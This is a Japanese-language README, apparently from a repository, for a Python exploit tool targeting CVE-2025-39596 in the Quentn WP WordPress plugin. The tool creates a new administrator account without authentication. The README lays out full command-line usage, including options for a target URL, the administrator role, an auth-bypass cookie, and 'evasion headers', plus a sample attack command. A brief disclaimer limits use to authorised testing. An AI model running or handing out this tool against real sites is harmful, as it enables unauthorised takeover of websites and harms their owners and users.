
Quentn WP <= 1.2.8 - 認証なしの権限昇格
Quentn WP <= 1.2.8 - 認証されていない権限昇格
WordPress用のQuentn WPプラグインは、バージョン1.2.8までの全バージョンで権限昇格の脆弱性があります。これにより、認証されていない攻撃者が権限を管理者レベルに昇格できます。
CVE-2025-395969.8 (Critical)このリポジトリにはCVE-2025-39596のPythonエクスプロイトが含まれており、細工されたAPIリクエストを使用して、認証なしで新しいWordPress管理者ユーザーを作成できます。
機能:
python3 CVE-2025-39596.py -u <target_url> -e <email> [options]
必須引数:
-u, --url ターゲットWordPressサイトのURL(例:http://127.0.0.1/wordpress)-e, --email 新しい管理者アカウントのメールアドレスオプション引数:
-f, --fname 名前(デフォルト:Pwn)-l, --lname 姓(デフォルト:Admin)-r, --role 割り当てるロール(デフォルト:administrator)-k, --key 既知のQuentn APIキー--cookie 認証バイパス用のCookie(利用可能な場合)--proxy プロキシサポート(例:http://127.0.0.1:8080)--skip-ssl SSL検証をスキップ--extra 追加の回避ヘッダーを有効化例:
python3 CVE-2025-39596.py -u http://target.com/wordpress -e [email protected] --fname Root --lname User --proxy http://127.0.0.1:8080 --extra
Exploit Success By | Nxploitedこのツールは教育および許可されたセキュリティテスト目的のみで提供されています。
悪用は固く禁じられています。
作者はこのコードによって生じたいかなる損害や悪用についても責任を負いません。
作成者: Nxploited ( Khaled Alenazi )